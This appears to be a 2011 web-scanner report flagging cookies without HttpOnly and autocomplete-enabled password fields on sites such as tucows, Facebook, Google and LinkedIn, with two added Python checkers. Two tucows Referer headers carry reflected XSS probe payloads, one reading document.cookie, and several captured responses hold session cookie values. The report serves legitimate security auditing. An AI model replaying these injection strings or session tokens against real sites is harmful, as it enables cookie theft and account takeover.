HTTP/1.1 200 OK Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=426B478F-39D1-44FA-72ED-6DB69361922A&LastUpdate=03/Feb/2011:12:30:36 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:36 GMT; Path=/ Date: Thu, 03 Feb 2011 20:30:37 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=53 Content-Length: 134607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.wix.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?hl=en&tab=w1 HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /results HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /watch HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /delivery/afr.php?n=aed03704&zoneid=124&cb=d302be2a HTTP/1.1 Host: www8.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; OAID=f41efd0364d75038834b62f043c90f9a
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /delivery/ck.php?oaparams=2__bannerid=1590__zoneid=64__OXLCA=1__cb=761e27d268__oadest=http%3A%2F%2Fwww.vipreantivirus.com%2Fspeed-matters.cfm%3Ftucows-ros-300x250 HTTP/1.1 Host: www8.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; OAGEO=US%7CTX%7C%7C%7C%7C%7C%7C%7C%7C%7C; OAID=f41efd0364d75038834b62f043c90f9a; __utmc=163973946; __utmb=163973946;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /delivery/lg.php?bannerid=1441&campaignid=125&zoneid=8&loc=1&referer=http%3A%2F%2Fwww.tucows.com%2Fsoftware.html&cb=21d1a15d20 HTTP/1.1 Host: www8.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
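The findings above apply two checks to every Set-Cookie header: is the HttpOnly attribute absent, and does the cookie name suggest a session token (which decides how much the missing flag matters). The following is an added example, not part of the original report or of Burp Scanner, that performs both checks on a raw HTTP response. The sample response is constructed to resemble the captured ones above (a veoh-style visitor cookie, an ASP.NET session cookie with HttpOnly, and a PHPSESSID without it); the name patterns used to guess "session token" are an assumption, not the scanner's actual heuristic.

```python
"""Flag Set-Cookie headers that lack HttpOnly and guess which ones carry
session tokens.  Added example; the SESSION_NAME_PATTERNS heuristic is an
assumption, not the scanner's own rule."""
import re
from typing import Dict, List, Tuple

# Assumed heuristic: cookie names that commonly hold a session identifier.
SESSION_NAME_PATTERNS = re.compile(r"sess|auth|token|_?sid$", re.IGNORECASE)


def split_headers(raw_response: str) -> List[Tuple[str, str]]:
    """Return (name, value) pairs from the header block of a raw HTTP response."""
    text = raw_response.replace("\r\n", "\n")
    head = text.split("\n\n", 1)[0]          # headers end at the first blank line
    pairs = []
    for line in head.split("\n")[1:]:        # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            pairs.append((name.strip(), value.strip()))
    return pairs


def parse_set_cookie(value: str) -> Dict[str, object]:
    """Split one Set-Cookie value into name, value and a lower-cased attribute set."""
    parts = [p.strip() for p in value.split(";")]
    name, _, cookie_value = parts[0].partition("=")
    # Attributes such as "Path=/" or "HttpOnly" are keyed by their lower-cased name.
    attrs = {p.split("=", 1)[0].strip().lower() for p in parts[1:] if p}
    return {"name": name.strip(), "value": cookie_value, "attrs": attrs}


def cookies_without_httponly(raw_response: str) -> List[Dict[str, object]]:
    """Report each cookie issued without HttpOnly, with a session-token guess."""
    findings = []
    for header, value in split_headers(raw_response):
        if header.lower() != "set-cookie":
            continue
        cookie = parse_set_cookie(value)
        if "httponly" in cookie["attrs"]:
            continue
        findings.append({
            "name": cookie["name"],
            "secure": "secure" in cookie["attrs"],
            "looks_like_session_token": bool(SESSION_NAME_PATTERNS.search(str(cookie["name"]))),
        })
    return findings


# Constructed sample response, modelled on the captured responses above.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: veohCookie=\"VisitorUID=C5282E33-9CD2-D729-6A94-BEC4BD8BA173&first=0\"; "
    "domain=.veoh.com; Path=/\r\n"
    "Set-Cookie: ASP.NET_SessionId=kzhsyk55h14dmof1ovtfne55; path=/; HttpOnly\r\n"
    "Set-Cookie: PHPSESSID=6299093c20d21df56a507e2d4f08aada; path=/\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html></html>"
)

if __name__ == "__main__":
    for finding in cookies_without_httponly(SAMPLE_RESPONSE):
        print(finding)
```

On the sample, veohCookie and PHPSESSID are reported (the ASP.NET_SessionId cookie is skipped because it carries HttpOnly), and only PHPSESSID is marked as a probable session token, which is the distinction the report draws when it says a cookie "does not appear to contain a session token".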
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, include the attribute autocomplete="off" within the FORM tag (to protect all fields in the form) or within the relevant INPUT tags (to protect specific individual fields). Note that current versions of the major browsers deliberately ignore autocomplete="off" on login forms and password fields and will still offer to save the credentials, so this attribute should be treated as a best-effort control rather than a guarantee.
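The check behind the findings that follow is simple: a password input is reported unless it, or the form enclosing it, carries autocomplete="off". The following is an added example, not code from the original report or from Burp Scanner, that implements that check with Python's stdlib HTML parser and records the form's action URL alongside each flagged field, as the report does. The sample markup is constructed to resemble the login and signup snippets captured on this page.

```python
"""Find password fields a browser may offer to remember.  Added example; the
sample markup is constructed, not taken from a captured response."""
from html.parser import HTMLParser
from typing import Dict, List, Optional


class PasswordFieldAudit(HTMLParser):
    """Collect password inputs that are not covered by autocomplete="off"."""

    def __init__(self) -> None:
        super().__init__()
        self.current_form: Optional[Dict[str, str]] = None
        self.findings: List[Dict[str, str]] = []

    @staticmethod
    def _attrs(attrs) -> Dict[str, str]:
        # html.parser lower-cases attribute names; a value-less attribute is None.
        return {k: (v or "") for k, v in attrs}

    def handle_starttag(self, tag, attrs):
        a = self._attrs(attrs)
        if tag == "form":
            self.current_form = {
                "action": a.get("action", ""),
                "autocomplete": a.get("autocomplete", "").strip().lower(),
            }
        elif tag == "input" and a.get("type", "").lower() == "password":
            field_ac = a.get("autocomplete", "").strip().lower()
            form_ac = self.current_form["autocomplete"] if self.current_form else ""
            # Either the field or its enclosing form may opt out of autocompletion.
            if field_ac != "off" and form_ac != "off":
                self.findings.append({
                    "field": a.get("name") or a.get("id", ""),
                    "action": self.current_form["action"] if self.current_form else "",
                })

    def handle_endtag(self, tag):
        if tag == "form":
            self.current_form = None


def password_fields_with_autocomplete(html: str) -> List[Dict[str, str]]:
    """Return one finding per password field that a browser may store."""
    parser = PasswordFieldAudit()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page: a plain login form, a signup form protected at the
# form level, and a form where only one of two password fields is protected.
SAMPLE_HTML = """
<form action="https://www.manta.com/member/login/" method="post">
  <input name="username" type="text">
  <input id="password" name="password" type="password" />
</form>
<form action="/signup.html" method="post" autocomplete="off">
  <input type="password" name="password">
  <input type="password" name="password2">
</form>
<form action="/acct/login.asp" method="post">
  <input type="password" name="pwd" autocomplete="off">
  <input type="password" name="pwc">
</form>
"""

if __name__ == "__main__":
    for finding in password_fields_with_autocomplete(SAMPLE_HTML):
        print(finding["action"], finding["field"])
```

Running it on the sample reports only the manta login field and the unprotected pwc field; the signup form is cleared by its form-level attribute and pwd by its own. Tracking the enclosing form is what lets the checker honour the FORM-level variant of the remediation rather than looking at each INPUT in isolation.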
The form contains the following password field with autocomplete enabled:
pw
Request
GET / HTTP/1.1 Host: advertise.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 22:03:27 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Set-Cookie: PHPSESSID=6299093c20d21df56a507e2d4f08aada; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 6299093c20d21df56a507e2d4f08aada=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 84850
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Free Software and Sh ...[SNIP]... <div id="signin" style="visibility: hidden;"> <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);"> <div class='bgBlue'> ...[SNIP]... <br /> <input type="password" name="pw" size="20" maxlength="20" value="" /> </p> ...[SNIP]...
The form contains the following password fields with autocomplete enabled:
pw
pwc
Request
GET / HTTP/1.1 Host: advertise.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 22:03:27 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Set-Cookie: PHPSESSID=6299093c20d21df56a507e2d4f08aada; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 6299093c20d21df56a507e2d4f08aada=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 84850
The page contains a form with the following action URL:
https://author.tucows.com/index.php
The form contains the following password field with autocomplete enabled:
password
Request
GET / HTTP/1.1 Host: author.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 22:03:52 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Connection: close Content-Type: text/html Content-Length: 13446
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <ti ...[SNIP]... </script>
The page contains a form with the following action URL:
http://boardreader.com/my/subscription.html
The form contains the following password field with autocomplete enabled:
pass
Request
GET /my.html HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:31:23 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
The page contains a form with the following action URL:
https://bugzilla.mozilla.org/show_bug.cgi
The form contains the following password field with autocomplete enabled:
Bugzilla_password
Request
GET /show_bug.cgi HTTP/1.1 Host: bugzilla.mozilla.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache X-Backend-Server: pm-app-bugs05 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Strict-transport-security: max-age=2629744; includeSubDomains Date: Thu, 03 Feb 2011 22:03:58 GMT Keep-Alive: timeout=300, max=1000 Connection: close Content-Length: 12477
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Search by bug number</title>
The form contains the following password field with autocomplete enabled:
Bugzilla_password
Request
GET /show_bug.cgi?id=378962 HTTP/1.1 Host: bugzilla.mozilla.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache X-Backend-Server: pm-app-bugs05 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Strict-transport-security: max-age=2629744; includeSubDomains Date: Thu, 03 Feb 2011 22:03:58 GMT Keep-Alive: timeout=300, max=1000 Connection: close Content-Length: 59121
The form contains the following password field with autocomplete enabled:
password
Request
GET /submit?phase=2&url=http://ir.supermedia.com/index.cfm? HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password field with autocomplete enabled:
vb_login_password
Request
GET /showthread.php?t\\x3d1355583\\x22 HTTP/1.1 Host: forums.digitalpoint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /supermedia HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:19:13 GMT Server: hi Status: 200 OK X-Transaction: 1296760753-13380-14514 ETag: "980457e03ec8c8ddfb67fd40ecd97bea" Last-Modified: Thu, 03 Feb 2011 19:19:13 GMT X-Runtime: 0.01072 Content-Type: text/html; charset=utf-8 Content-Length: 50851 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296760753269662; path=/; expires=Thu, 10-Feb-11 19:19:13 GMT; domain=.twitter.com Set-Cookie: guest_id=129676075327739820; path=/; expires=Sat, 05 Mar 2011 19:19:13 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCH%252FM9uwtAToHaWQiJTRmZjcyZDZjOTYwYzFj%250ANDkxYTkzZDhhNmVhN2Q2OGNhIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--100f876db5da30de78a91b22d9b5e99bb4d21a14; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
http://www.butterscotch.com/?src=tcv3video
The form contains the following password field with autocomplete enabled:
password
Request
GET /?src=tcv3video HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
http://www.butterscotch.com/signup.html
The form contains the following password fields with autocomplete enabled:
password
password2
Request
GET /?src=tcv3video HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
http://www.butterscotch.com/
The form contains the following password field with autocomplete enabled:
password
Request
GET / HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
http://www.butterscotch.com/tutorials.html
The form contains the following password field with autocomplete enabled:
password
Request
GET /tutorials.html HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
http://www.butterscotch.com/signup.html
The form contains the following password fields with autocomplete enabled:
password
password2
Request
GET /tutorials.html HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
http://www.ericmmartin.com/wordpress/wp-login.php
The form contains the following password field with autocomplete enabled:
pwd
Request
GET /projects/simplemodal/ HTTP/1.1 Host: www.ericmmartin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:49:00 GMT Server: Apache X-Powered-By: PHP/5.3.3 Expires: Thu, 19 Nov 1981 08:52:00 GMT X-Pingback: http://www.ericmmartin.com/wordpress/xmlrpc.php Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Thu, 03 Feb 2011 20:01:19 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 34911
The page contains a form with the following action URL:
http://www.facebook.com/
The form contains the following password field with autocomplete enabled:
reg_passwd__
Request
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=Al9E9; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 21:49:20 GMT Content-Length: 30803
The form contains the following password field with autocomplete enabled:
pass
Request
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=Al9E9; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 21:49:20 GMT Content-Length: 30803
The form contains the following password field with autocomplete enabled:
pass
Request
GET /2008/fbml HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 404 Not Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=xRgPt; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 21:49:29 GMT Content-Length: 11422
The form contains the following password field with autocomplete enabled:
pass
Request
GET /share.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=y_9KTbq--wiemAhPZf9cZRCm; expires=Sat, 02-Feb-2013 19:19:39 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=yNjLf; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 19:19:39 GMT Content-Length: 10796
The form contains the following password field with autocomplete enabled:
pass
Request
GET /supermediacom HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=yP9KTbiv931zl65aXpcqa4m-; expires=Sat, 02-Feb-2013 19:19:36 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=bxxex; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 19:19:37 GMT Content-Length: 146681
The page contains a form with the following action URL:
https://www.google.com/accounts/ServiceLoginAuth
The form contains the following password field with autocomplete enabled:
Passwd
Request
GET /accounts/Login HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
The page contains a form with the following action URL:
https://www.google.com/accounts/ServiceLoginAuth
The form contains the following password field with autocomplete enabled:
Passwd
Request
GET /accounts/ServiceLogin HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
The page contains a form with the following action URL:
https://www.linkedin.com/secure/login
The form contains the following password field with autocomplete enabled:
session_password
Request
GET /shareArticle HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Expires: 0 Pragma: no-cache Cache-control: no-cache, must-revalidate, max-age=0 Set-Cookie: leo_auth_token="GST:ZvpYDWFtWOPUWYjh_jHyedipSluAqpcn6vhruIXa2CDdWVdPpP66g5:1296760855:7d27a506e0853359e3965f871f95b1bfef8c45d6"; Version=1; Max-Age=1799; Expires=Thu, 03-Feb-2011 19:50:54 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: JSESSIONID="ajax:0561599565067721010"; Version=1; Path=/ Set-Cookie: visit=G; Expires=Tue, 21-Feb-2079 22:35:02 GMT; Path=/ Set-Cookie: bcookie="v=1&695a9322-0059-4252-9172-662df4a2e00f"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 22:35:02 GMT; Path=/ Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Content-Length: 7453 Date: Thu, 03 Feb 2011 19:20:54 GMT Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965045525d5f4f58455e445a4a42198c;expires=Thu, 03-Feb-2011 19:51:08 GMT;path=/;httponly
The page contains a form with the following action URL:
http://membercenter.made-in-china.com/logon.do
The form contains the following password field with autocomplete enabled:
logonInfo.logPassword
Request
GET / HTTP/1.1 Host: www.made-in-china.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
https://www.manta.com/member/login/
The form contains the following password field with autocomplete enabled:
password
Request
GET /c/mm49ryk/a-b-c-development-company-inc/x22 HTTP/1.1 Host: www.manta.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>A B C Development ...[SNIP]... <div class="form-login"> <form action="https://www.manta.com/member/login/" method="post" id="top_login_form"> <fieldset> ...[SNIP]... <span><input id="password" name="password" title="password" type="password" class="top_login_password" /></span> ...[SNIP]...
The page contains a form with the following action URL:
https://www.manta.com/member/login/
The form contains the following password field with autocomplete enabled:
password
Request
GET /c/mm8136k/abc-development-inc/x22 HTTP/1.1 Host: www.manta.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
